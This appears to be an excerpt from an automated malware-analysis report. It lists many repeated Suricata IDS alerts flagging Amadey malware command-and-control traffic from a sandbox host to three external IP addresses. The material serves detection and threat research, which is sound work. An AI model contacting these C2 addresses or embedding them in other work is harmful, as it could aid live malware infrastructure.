Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52224 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52264 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52229 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52305 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52239 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52301 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52242 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52271 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52358 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52226 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52214 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52219 -> 89.23.103.42:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52334 -> 89.23.103.42:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52218 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52220 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52215 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52257 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52262 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52445 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52280 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52268 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52368 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52320 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52253 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52438 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52237 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52370 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52326 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52467 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52315 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52245 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52241 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52341 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52328 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52325 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52430 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52522 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52234 -> 89.23.103.42:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52236 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52505 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52246 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52254 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52457 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52221 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52270 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52431 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52346 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52376 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52291 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52293 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52285 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52269 -> 89.23.103.42:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52265 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52475 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52247 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52417 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52286 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52274 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52379 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52318 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52259 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52296 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52338 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52384 -> 89.23.103.42:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52482 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52273 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52372 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52388 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52354 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52497 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52646 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52533 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52579 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52309 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52359 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52299 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52479 -> 89.23.103.42:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52399 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52677 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52520 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52279 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52282 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52364 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52414 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52366 -> 89.23.103.42:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52403 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52393 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52353 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52256 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52450 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52281 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52287 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52508 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52322 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52402 -> 89.23.103.42:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52311 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52544 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52419 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52410 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52624 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52381 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52330 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52465 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52552 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52290 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52302 -> 89.23.103.42:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52361 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52453 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52427 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52661 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52553 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52407 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52485 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52349 -> 89.23.103.42:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52667 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52308 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52298 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52344 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52512 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52570 -> 89.23.103.42:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52458 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52441 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52446 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52611 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52523 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52509 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52478 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52516 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52424 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52389 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52351 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52400 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52342 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52495 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52464 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52411 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52316 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52347 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52504 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52489 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52603 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52317 -> 89.23.103.42:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52420 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52332 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52592 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52337 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52321 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52588 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52557 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52336 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52675 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52633 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52502 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52535 -> 89.23.103.42:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52538 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52484 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52688 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52385 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52515 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52606 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52352 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52650 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52460 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52472 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52434 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52545 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52421 -> 89.23.103.42:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52547 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52564 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52303 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52581 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52630 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52571 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52365 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52541 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52406 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52651 -> 89.23.103.42:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52488 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52517 -> 89.23.103.42:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52554 -> 89.23.103.42:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52448 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52591 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52314 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52610 -> 89.23.103.42:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52657 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52363 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52526 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52534 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52585 -> 185.208.158.116:80
